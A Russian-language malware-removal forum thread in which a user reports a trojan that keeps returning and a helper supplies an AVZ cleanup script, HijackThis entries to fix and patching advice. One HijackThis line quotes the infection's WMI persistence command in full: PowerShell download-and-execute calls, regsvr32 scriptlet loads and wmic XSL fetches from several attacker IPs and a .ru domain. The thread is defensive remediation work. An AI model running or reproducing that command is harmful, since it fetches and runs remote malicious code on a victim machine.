Вирус заново появляется непонятным образом спустя несколько часов

**JClever** · 13.08.2020, 22:24

Всем доброго времени суток.

Появился троян в системе. Из внешних проявлений - закрывает браузер при попытке перейти на сайт касперского или дрвеба. Добавляет две строки в файл hosts. По описанию похож на Trojan.MulDrop11.20247
При лечении с помощью DrWeb Live Disk утилита CureIt находит заражённые файлы, в том числе один вирус в MBR. Потом пишет что всё вылечено, однако при повторном сканировании сразу же снова находит вирусы.
При лечении с помощью Kaspersky Resque Disk он находит 37 заражённых объектов, один также в загрузочном секторе, и успешно их лечит (при повторном сканировании уже не находит). Действительно, вирус в системе отсутствует около 12 часов, потом снова появляется с теми же симптомами. И так происходит уже в третий раз. Крон чистил, автозагрузку смотрел, новый софт поудалял, ничего нового не скачивал и не запускал. Не пойму откуда он берётся?

Необходимые логи прилагаю.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 13.08.2020, 22:25

Уважаемый(ая) JClever, спасибо за обращение на наш форум!

Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**Vvvyg** · 13.08.2020, 22:54

Выполните скрипт в AVZ из папки Autologger:

Код:

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 TerminateProcessByName('c:\windows\temp\conhou.exe');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 QuarantineFile('c:\windows\temp\conhos.exe', '');
 QuarantineFile('c:\windows\temp\conhou.exe', '');
 QuarantineFile('lsma12.exe', '');
 QuarantineFileF('C:\Program Files (x86)\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js', true, '', 0, 0);
 DeleteFile('a.exe', '');
 DeleteFile('c:\windows\debug\item.dat', '');
 DeleteFile('c:\windows\debug\ok.dat', '');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 DeleteFile('c:\windows\temp\conhos.exe', '');
 DeleteFile('c:\windows\temp\conhou.exe', '');
 DeleteFile('lsma12.exe', '');
 ExecuteFile('schtasks.exe', '/delete /TN "MicrosoftsWindows" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MicrosoftsWindowsu" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "oka" /F', 0, 15000, true);
 DeleteFileMask('C:\Program Files (x86)\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH', '*', true);
 DeleteDirectory('C:\Program Files (x86)\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:

Код:

O4 - MSConfig\startupreg: SunJavaUpdateSched [command] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (HKLM) (2020/07/11) (file missing)
O7 - IPSec: Name: win (2020/08/13) - {cc2e892a-f682-41fb-bd9b-b2f8f7d78da1} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/13) - {cc2e892a-f682-41fb-bd9b-b2f8f7d78da1} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/13) - {cc2e892a-f682-41fb-bd9b-b2f8f7d78da1} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/13) - {cc2e892a-f682-41fb-bd9b-b2f8f7d78da1} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/08/13) - {cc2e892a-f682-41fb-bd9b-b2f8f7d78da1} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

Я правильно понимаю, в сети есть другие компьютеры? С них через уязвимости и получаете, скорее всего, заразу снова.

Отключите компьютер от сети, пролечите KVRT или Dr. Web CureIt!.
Обновите систему, лучше полностью, Набор обновлений UpdatePack7R2 для Windows 7 SP1 и Server 2008 R2 SP1. По минимуму установите, хотя бы, KB4012212, чтобы закрыть самую опасную уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.

Затемскачайте актуальную версию Autologger по первой ссылке из правил и сделайте новые логи, у вас применялся устаревший

**JClever** · 13.08.2020, 23:32

Скрипт выполнить могу, но уже успел прогнать Каспером, поэтому карантин будет пустой. После каспера всё сохранял в карантин, их прилагаю к сообщению. quarantine.zip - это вчерашний, соответственно Quarantine-2.zip - сегодняшний.
Карантин именно от AVZ, думаю, смогу залить по ссылке днём (часов через 10-12, после очередного заражения).
Через HiJack сейчас пофиксю, спасибо.
Других компов в данный момент нет. Есть роутер Linksys, с NAT и файрволом, и приставка Ростелекома к телевизору. IP-адрес статический, возможно поэтому заливают, конечно, юзая уязвимость в винде, но с учётом роутера и аппаратных файрволов как-то странно это всё.
Обновление установлю, спасибо.
Новый автологгер, видимо, тоже нужно будет запускать после очередного заражения, то есть завтра.

**Vvvyg** · 19.08.2020, 09:59

Итого - как дела?

Вирус заново появляется непонятным образом спустя несколько часов (заявка № 225479)

Опции темы